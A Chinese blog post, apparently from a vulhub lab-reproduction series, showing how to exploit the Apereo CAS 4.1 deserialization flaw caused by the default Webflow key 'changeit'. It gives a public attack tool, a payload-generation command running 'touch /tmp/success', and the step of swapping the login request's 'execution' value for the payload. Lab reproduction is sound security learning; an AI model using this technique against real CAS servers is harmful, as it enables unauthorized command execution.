Apereo CAS 4.1 反序列化命令执行漏洞

最新推荐文章于 2024-06-17 23:23:26 发布

shierbai

最新推荐文章于 2024-06-17 23:23:26 发布

阅读量401

点赞数 17

分类专栏： vulhub复现学习合集文章标签：安全 web安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/shierbai/article/details/139112514

版权

vulhub复现学习合集专栏收录该内容

19 篇文章 0 订阅

订阅专栏

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。

访问`http://your-ip:8080/cas/login`即可查看到登录页面

漏洞原理实际上是Webflow中使用了默认密钥`changeit`

我们使用

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

如果报错试试换java版本

记一次jmet报错信息Exception in thread “main“ java.lang.IllegalAccessError: class ysoserial.payloads.util.Ga_exception in thread "main" java.lang.illegalaccess-CSDN博客

然后我们登录CAS并抓包，将Body中的`execution`值替换成上面生成的Payload发送

命令执行成功

关注

17
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
Apereo CAS 4.1 反序列化命令执行漏洞

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。然后我们登录CAS并抓包，将Body中的`execution`值替换成上面生成的Payload发送。访问`http://your-ip:8080/cas/login`即可查看到登录页面。漏洞原理实际上是Webflow中使用了默认密钥`changeit`如果报错试试换java版本。
复制链接

扫一扫

专栏目录

shierbai CSDN认证博客专家 CSDN认证企业博客

码龄5年

51: 原创

1万+: 周排名

3万+: 总排名

1万+: 访问

: 等级

873: 积分

297: 粉丝

362: 获赞

4: 评论

167: 收藏

私信

关注

热门文章

分类专栏

最新评论

Apache Airflow Celery 消息中间件命令执行（CVE-2020-11981）
北风之神c: 总结的很全面，写得赞，博主用心了。 celery对目录层级文件名称格式要求太高，只适合规划新的项目，对不规则文件夹套用难度高。所以新手使用celery很仔细的建立文件夹名字、文件夹层级、python文件名字。所以网上的celery博客教程虽然很多，但是并不能学会使用，因为要运行起来需要以下6个方面都掌握好，博客文字很难表达清楚或者没有写全面以下6个方面。 celery消费任务不执行或者报错NotRegistered，与很多方面有关系，如果要别人排错，至少要发以下6方面的截图，因为与一下6点关系很大。 1)整个项目目录结构, 2）@task入参 ,3）celery的配置，4）celery的配置 include ,5）cmd命令行启动参数 --queues= 的值,6）用户在启动cmd命令行时候，用户所在的文件夹。在不规范的文件夹路径下，使用celery难度很高，一般教程都没教。 [项目文件夹目录格式不规范下的celery使用演示](https://github.com/ydf0509/celery_demo) 。此国产分布式函数调度框架 funboost python万能通用函数加速器 https://funboost.readthedocs.io/ ，从用法调用难度，用户所需代码量，超高并发性能，qps控频精确程度，支持的中间件类型，任务控制方式，稳定程度等19个方面全方位超过celery。发布性能提高1000%，消费性能提高2000%。 python万能分布式函数调度框架funboost支持python所有类型的并发模式和一切知名消息队列中间件，python函数加速器，框架包罗万象,万能编程功能宝典，一统编程思维，与业务不绑定，适用范围广。 funboot能支持celery作为中间件，用户可以使用funboost的极简api来使用celery核心调度，不用手动复杂的配置操作celery funboost 自动化操作celery https://github.com/ydf0509/funboost_support_celery_demo pip install funboost
尤里的复仇II 回归 fuzz
CSDN-Ada助手: 恭喜您发布第12篇博客！看到您带着“尤里的复仇II 回归 fuzz”这样的标题，我感到非常期待。您的创作一直都很吸引人，带来了新鲜的视角和精彩的故事。希望您能继续保持创作的热情，不断挖掘更多有趣的内容。或许在下一篇博客中可以尝试加入一些意想不到的情节或者更多的角色发展，让读者们更加着迷。期待您的下一篇作品！
封神台靶场【渗透】看你是否能进入后台
CSDN-Ada助手: 恭喜作者在封神台靶场的渗透中取得了成功，展现了出色的技术水平！希望作者能继续保持创作的热情和努力，不断挑战自我，拓展更多的创作领域。或许下一步可以尝试结合更多的实例和案例，让读者更加深入地了解渗透的技术和方法，期待作者的更多精彩作品！
封神台靶场【渗透】看你是否能进入后台
CSDN-Ada助手: 恭喜用户写下了第13篇博客！标题“封神台靶场【渗透】看你是否能进入后台”真是引人瞩目。希望您能继续坚持写作，为读者们带来更多有趣、实用的内容。下一步，或许可以考虑分享一些关于网络安全领域的实用技巧和经验，让我们能够更好地保护自己的信息安全。期待您的下一篇精彩文章！
封神台尤里的复仇II 回归信息收集1&&2
CSDN-Ada助手: 恭喜您写了第10篇博客！标题“封神台尤里的复仇II 回归信息收集1&&2”听起来就让人期待不已。希望您能继续保持创作的热情和精力，为读者带来更多精彩的内容。或许在下一篇博客中，可以深入探讨尤里的复仇故事情节，或者分享一些关于信息收集的技巧和经验。期待您的下一篇作品！愿您在创作的道路上越走越远，不断进步！

最新文章

2024

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。